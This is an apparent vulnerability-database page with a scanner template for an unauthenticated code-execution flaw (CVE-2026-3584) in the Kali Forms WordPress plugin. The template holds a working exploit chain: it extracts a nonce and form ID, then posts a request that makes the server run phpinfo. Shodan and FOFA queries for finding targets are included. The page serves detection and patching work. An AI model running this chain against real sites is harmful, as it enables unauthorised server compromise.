WordPress Kali Forms <= 2.4.9 - Remote Code Execution
CVE-2026-3584
Verified
Description
Kali Forms WordPress plugin <= 2.4.9 contains a remote code execution caused by unsafe user input handling in 'form_process' and 'prepare_post_data' functions, letting unauthenticated attackers execute code on the server, exploit requires no authentication.
Severity
Critical
CVSS Score
9.8
Exploit Probability
28%
Affected Product
kali-forms
Published Date
April 9, 2026
Template Author
pussycat0x
CVE-2026-3584.yaml
id: CVE-2026-3584
info:
name: WordPress Kali Forms <= 2.4.9 - Remote Code Execution
author: pussycat0x
severity: critical
description: |
Kali Forms WordPress plugin <= 2.4.9 contains a remote code execution caused by unsafe user input handling in 'form_process' and 'prepare_post_data' functions, letting unauthenticated attackers execute code on the server, exploit requires no authentication.
impact: |
Unauthenticated attackers can execute arbitrary code on the server, potentially leading to full system compromise.
remediation: |
Update to the latest version beyond 2.4.9.
reference:
- https://wordpress.org/plugins/kali-forms/
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-3584
epss-score: 0.27906
epss-percentile: 0.96533
cwe-id: CWE-94
metadata:
verified: true
max-request: 6
product: kali-forms
framework: wordpress
fofa-query: body="kali-forms"
shodan-query: http.component:"WordPress" http.html:"kali-forms"
tags: cve,cve2026,wordpress,wp-plugin,kali-forms,rce,unauth,vkev
flow: |
var paths = ["/contact-us/", "/contact/", "/form/", "/feedback/", "/"];
for (var i = 0; i < paths.length; i++) {
set("form_path", paths[i]);
if (http(1)) {
http(2);
break;
}
}
http:
- raw:
- |
GET {{form_path}} HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "KaliFormsObject")'
- 'contains(body, "ajax_nonce")'
condition: and
internal: true
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'ajax_nonce":"([a-f0-9]+)"'
internal: true
- type: regex
name: form_id
part: body
group: 1
regex:
- 'data-form-id="(\d+)"'
internal: true
- type: regex
name: version
part: body
group: 1
regex:
- 'kali-forms/[^"]*(?:js|css)\?ver=([0-9.]+)'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=kaliforms_form_process&data[nonce]={{nonce}}&data[formId]={{form_id}}&data[first-name]=test&data[last-name]=user&data[email]=test%40example.com&data[message]=test&data[thisPermalink]=phpinfo
matchers-condition: and
matchers:
- type: word
part: body
words:
- "phpinfo()</title>"
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: php_version
part: body
group: 1
regex:
- 'PHP Version ([0-9.]+)'
# digest: 4b0a00483046022100d865cb15c7ed32c92db54f2f1b80d9c27699f8d0070bb10127d7b7947c94882b022100b1f457459d62379aa2f0ee872b96e323211d0f80b9f7d145a48c32bba3cfd2e6:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-3584
CWE ID:
cwe-94
Remediation Steps
Update to the latest version beyond 2.4.9.